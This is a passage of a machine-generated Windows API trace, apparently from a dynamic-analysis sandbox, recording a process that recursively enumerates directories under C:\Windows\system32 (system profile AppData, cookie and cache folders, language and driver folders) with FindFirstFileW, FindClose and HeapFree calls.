lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\*", lpFindFileData=0x720388 | out: lpFindFileData=0x720388*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7205e0 [0060.425] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x721628 | out: lpFindFileData=0x721628*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x721880 [0060.425] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\*", lpFindFileData=0x7228c8 | out: lpFindFileData=0x7228c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2829382e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2829382e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x722b20 [0060.425] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x723b68 | out: lpFindFileData=0x723b68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2829382e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2829382e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2829382e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x723dc0 [0060.427] FindClose (in: hFindFile=0x723dc0 | out: hFindFile=0x723dc0) returned 1 [0060.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x723b68 | out: hHeap=0x6e0000) returned 1 [0060.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\*", lpFindFileData=0x723b68 | out: lpFindFileData=0x723b68*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x723dc0 [0060.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*", lpFindFileData=0x724e08 | out: lpFindFileData=0x724e08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24aa32c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24aa32c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x725060 [0060.427] FindClose (in: hFindFile=0x725060 | out: hFindFile=0x725060) returned 1 [0060.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x724e08 | out: hHeap=0x6e0000) returned 1 [0060.428] FindClose (in: hFindFile=0x723dc0 | out: hFindFile=0x723dc0) returned 1 [0060.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x723b68 | out: hHeap=0x6e0000) returned 1 [0060.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*", lpFindFileData=0x723b68 | out: lpFindFileData=0x723b68*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x723dc0 [0060.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x724e08 | out: lpFindFileData=0x724e08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x725060 [0060.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0PS72R2M\\*", lpFindFileData=0x7260a8 | out: lpFindFileData=0x7260a8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x726300 [0060.429] FindClose (in: hFindFile=0x726300 | out: hFindFile=0x726300) returned 1 [0060.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7260a8 | out: hHeap=0x6e0000) returned 1 [0060.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\62AXOPQ5\\*", lpFindFileData=0x7260a8 | out: lpFindFileData=0x7260a8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x726300 [0060.430] FindClose (in: hFindFile=0x726300 | out: hFindFile=0x726300) returned 1 [0060.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7260a8 | out: hHeap=0x6e0000) returned 1 [0060.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\FZG8CKJ5\\*", lpFindFileData=0x7260a8 | out: lpFindFileData=0x7260a8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x726300 [0060.430] FindClose (in: hFindFile=0x726300 | out: hFindFile=0x726300) returned 1 [0060.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7260a8 | out: hHeap=0x6e0000) returned 1 [0060.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\LIXMVQOA\\*", lpFindFileData=0x7260a8 | out: lpFindFileData=0x7260a8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x726300 [0060.432] FindClose (in: hFindFile=0x726300 | out: hFindFile=0x726300) returned 1 [0060.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7260a8 | out: hHeap=0x6e0000) returned 1 [0060.432] FindClose (in: hFindFile=0x725060 | out: hFindFile=0x725060) returned 1 [0060.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x724e08 | out: hHeap=0x6e0000) returned 1 [0060.433] FindClose (in: hFindFile=0x723dc0 | out: hFindFile=0x723dc0) returned 1 [0060.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x723b68 | out: hHeap=0x6e0000) returned 1 [0060.433] FindClose (in: hFindFile=0x722b20 | out: hFindFile=0x722b20) returned 1 [0060.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7228c8 | out: hHeap=0x6e0000) returned 1 [0060.433] FindClose (in: hFindFile=0x721880 | out: hFindFile=0x721880) returned 1 [0060.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x721628 | out: hHeap=0x6e0000) returned 1 [0060.433] FindClose (in: hFindFile=0x7205e0 | out: hFindFile=0x7205e0) returned 1 [0060.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x720388 | out: hHeap=0x6e0000) returned 1 [0060.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\*", lpFindFileData=0x720388 | out: lpFindFileData=0x720388*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x51ab36f5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7205e0 [0060.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x721628 | out: lpFindFileData=0x721628*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x721880 [0060.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x7228c8 | out: lpFindFileData=0x7228c8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x722b20 [0060.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x723b68 | out: lpFindFileData=0x723b68*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x723dc0 [0060.435] FindClose (in: hFindFile=0x723dc0 | out: hFindFile=0x723dc0) returned 1 [0060.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x723b68 | out: hHeap=0x6e0000) returned 1 [0060.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x723b68 | out: lpFindFileData=0x723b68*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x723dc0 [0060.435] FindClose (in: hFindFile=0x723dc0 | out: hFindFile=0x723dc0) returned 1 [0060.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x723b68 | out: hHeap=0x6e0000) returned 1 [0060.435] FindClose (in: hFindFile=0x722b20 | out: hFindFile=0x722b20) returned 1 [0060.436] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7228c8 | out: hHeap=0x6e0000) returned 1 [0060.436] FindClose (in: hFindFile=0x721880 | out: hFindFile=0x721880) returned 1 [0060.436] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x721628 | out: hHeap=0x6e0000) returned 1 [0060.436] FindClose (in: hFindFile=0x7205e0 | out: hFindFile=0x7205e0) returned 1 [0060.436] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x720388 | out: hHeap=0x6e0000) returned 1 [0060.436] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\*", lpFindFileData=0x720388 | out: lpFindFileData=0x720388*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7205e0 [0060.436] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x721628 | out: lpFindFileData=0x721628*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x721880 [0060.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x7228c8 | out: lpFindFileData=0x7228c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x722b20 [0060.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x723b68 | out: lpFindFileData=0x723b68*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24aa32c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24aa32c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x723dc0 [0060.439] FindClose (in: hFindFile=0x723dc0 | out: hFindFile=0x723dc0) returned 1 [0060.439] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x723b68 | out: hHeap=0x6e0000) returned 1 [0060.439] FindClose (in: hFindFile=0x722b20 | out: hFindFile=0x722b20) returned 1 [0060.439] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7228c8 | out: hHeap=0x6e0000) returned 1 [0060.439] FindClose (in: hFindFile=0x721880 | out: hFindFile=0x721880) returned 1 [0060.439] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x721628 | out: hHeap=0x6e0000) returned 1 [0060.439] FindClose (in: hFindFile=0x7205e0 | out: hFindFile=0x7205e0) returned 1 [0060.439] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x720388 | out: hHeap=0x6e0000) returned 1 [0060.439] FindClose (in: hFindFile=0x71f340 | out: hFindFile=0x71f340) returned 1 [0060.439] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71f0e8 | out: hHeap=0x6e0000) returned 1 [0060.439] FindClose (in: hFindFile=0x71e0a0 | out: hFindFile=0x71e0a0) returned 1 [0060.439] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d9d8 | out: hHeap=0x6e0000) returned 1 [0060.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\TxR\\*", lpFindFileData=0x71d9d8 | out: lpFindFileData=0x71d9d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xf1e088, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71e0a0 [0060.440] FindClose (in: hFindFile=0x71e0a0 | out: hFindFile=0x71e0a0) returned 1 [0060.440] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d9d8 | out: hHeap=0x6e0000) returned 1 [0060.440] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.440] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71de48 | out: hHeap=0x6e0000) returned 1 [0060.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\cs-CZ\\*", lpFindFileData=0x71c9d0 | out: lpFindFileData=0x71c9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cc4abd3, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cc4abd3, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.442] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.443] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71c9d0 | out: hHeap=0x6e0000) returned 1 [0060.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\da-DK\\*", lpFindFileData=0x71c9d0 | out: lpFindFileData=0x71c9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8fab5928, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8fab5928, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.460] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71c9d0 | out: hHeap=0x6e0000) returned 1 [0060.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\de-DE\\*", lpFindFileData=0x71c9d0 | out: lpFindFileData=0x71c9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x2737b7c, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x2737b7c, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.463] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71c9d0 | out: hHeap=0x6e0000) returned 1 [0060.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\Dism\\*", lpFindFileData=0x71d1c0 | out: lpFindFileData=0x71d1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf441e2, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e52f2f2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e52f2f2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\Dism\\en-US\\*", lpFindFileData=0x71d638 | out: lpFindFileData=0x71d638*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e52f2f2, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e5555ab, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727e50 [0060.469] FindClose (in: hFindFile=0x727e50 | out: hFindFile=0x727e50) returned 1 [0060.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d638 | out: hHeap=0x6e0000) returned 1 [0060.470] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d1c0 | out: hHeap=0x6e0000) returned 1 [0060.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\*", lpFindFileData=0x71d1c0 | out: lpFindFileData=0x71d1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf441e2, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e9ce759, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\en-US\\*", lpFindFileData=0x71d7b8 | out: lpFindFileData=0x71d7b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22952f33, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x729ee8 [0060.472] FindClose (in: hFindFile=0x729ee8 | out: hFindFile=0x729ee8) returned 1 [0060.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d7b8 | out: hHeap=0x6e0000) returned 1 [0060.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\UMDF\\*", lpFindFileData=0x71d7b8 | out: lpFindFileData=0x71d7b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1e9ce759, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da10 [0060.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\UMDF\\en-US\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22894196, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.472] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.472] FindClose (in: hFindFile=0x71da10 | out: hFindFile=0x71da10) returned 1 [0060.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d7b8 | out: hHeap=0x6e0000) returned 1 [0060.473] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d1c0 | out: hHeap=0x6e0000) returned 1 [0060.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\*", lpFindFileData=0x71d1c0 | out: lpFindFileData=0x71d1c0*(dwFileAttributes=0x10, 